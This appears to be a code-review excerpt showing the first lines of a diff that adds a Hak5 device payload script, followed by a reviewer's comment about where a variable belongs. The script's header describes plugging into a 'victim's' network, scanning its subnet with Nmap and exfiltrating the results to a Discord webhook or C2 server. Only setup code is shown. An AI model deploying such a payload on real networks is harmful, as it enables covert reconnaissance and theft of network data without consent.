payloads/library/recon/Nmap-w-Discord-C2/payload.sh

```diff
@@ -0,0 +1,110 @@
+#!/bin/bash
+# Title:         Nmap Quickscan w/ Discord Integration (Cleaned & C2 Enabled)
+# Author:        REDD of Private-Locker
+# Version:       1.3
+#
+# This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. 
+# The Payload waits for "Internet Connection" to be present. Once Internet Connection is found,
+# It scans the local subnet for any online devices. - While also logging the Public IP of the
+# Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.)
+#
+# Magenta w/ Yellow ........Waiting for Internet
+# 1st Yellow flashing.......Scanning for Gateway/Subnet
+# Cyan flashing.............Running Nmap scan on x.0/24
+# 2nd Yellow Flashing.......Installing dependencies for Discord Integration
+# Yellow....................Sent to Discord Webhook
+# Blue......................Exfiltrating to C2
+# Red.......................Failed C2/EXFIL/Scanning
+# Green.....................Finished
+
+# Turn on Discord Integration (Yes = 1, No = 0)
+DISCORD=0
+WEBHOOK='PLACE_DISCORD_WEBHOOK_HERE'
+# Send Loot as File or Plain Messages (File = 1, Messages = 0)
+AS_FILE=0
+
+if [ -f "/etc/device.config" ]; then
+        INITIALIZED=1
+else
+        INITIALIZED=0
+fi
+LED SETUP
+NETMODE DHCP_CLIENT
+while ! ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done
+URL="http://www.example.com"
```

Comment:
Please move this up with your other variables. this makes it easier for the user to find and configure.